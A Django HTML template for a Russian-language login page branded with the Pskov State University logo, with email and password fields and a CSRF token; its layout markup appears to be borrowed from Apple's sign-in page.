{% extends 'ui_interface/index.htm' %}
{% load static %}
{% load crispy_forms_tags %}
{% block content %}
<link rel="stylesheet" type="text/css" media="screen" href="{% static '/auth/app.css' %}">
<script type="text/javascript" src="{% static '/auth/common-header.js' %}"></script>
<apple-auth app-loading-defaults="{appLoadingDefaults}" pmrpc-hook="{pmrpcHook}">
    <div class="widget-container  fade-in restrict-min-content  restrict-max-wh  fade-in " data-mode="embed"
         data-isiebutnotedge="false">
        <div id="step" class="si-step  ">
            <logo {hide-app-logo}="hideAppLogo" {show-fade-in}="showFadeIn">
                <div class="logo   signin-label  fade-in ">
                    <img style="width: 320px; height: auto;"
                         src="{% static 'images/pskovgu/logo_blue_pic-removebg-preview.png' %}"
                         alt="Логотип ПсковГУ" srcset="" role="presentation" style="width: 100px;">
                </div>
            </logo>
            <div id="stepEl" class=" ">
                <sign-in>
                    <div class="signin fade-in" id="signin">
                        <app-title signin-label="true" title-class="">
                            <h1 class="si-container-title tk-intro ">
                                Войти в аккаунт
                            </h1>
                        </app-title>
                        <form action="#" method="post" class="signup-form">
                            {% csrf_token %}
                            <div class="container si-field-container  password-second-step     ">
                                <div id="sign_in_form" class="signin-form fed-auth hide-password">
                                    <div class="si-field-container container">
                                        <div class="form-table">
                                            <div class="account-name form-row">
                                                <label class="sr-only form-cell form-label"
                                                       for="email">Авторизация</label>
                                                {{ form.email }}
                                            </div>
                                            <div class="form-row" style="padding-top: 10px">
                                                <label class="sr-only form-cell form-label"
                                                       for="password">Пароль</label>
                                                {{ form.password }}
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-md-12" style="padding-top: 20px">
                                    <button type="submit" class="button">Войти в аккаунт</button>
                                </div>
                            </div>
                        </form>
                    </div>
                </sign-in>
            </div>
        </div>
        <div id="stocking" style="display:none !important;"></div>
    </div>
    <idms-modal wrap-class="full-page-error-wrapper " {(show)}="showfullPageError" auto-close="false">
    </idms-modal>
</apple-auth>
{% endblock %}
